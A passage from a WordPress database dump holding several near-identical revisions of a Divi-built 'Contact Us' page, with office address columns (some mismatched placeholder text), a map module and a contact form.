button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:55:10','2020-08-07 20:55:10','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(645,1,'2020-08-07 20:57:37','2020-08-07 20:57:37','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:57:37','2020-08-07 20:57:37','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(647,1,'2020-08-07 20:58:15','2020-08-07 20:58:15','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||110px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:58:15','2020-08-07 20:58:15','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(648,1,'2020-08-07 20:58:32','2020-08-07 20:58:32','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" 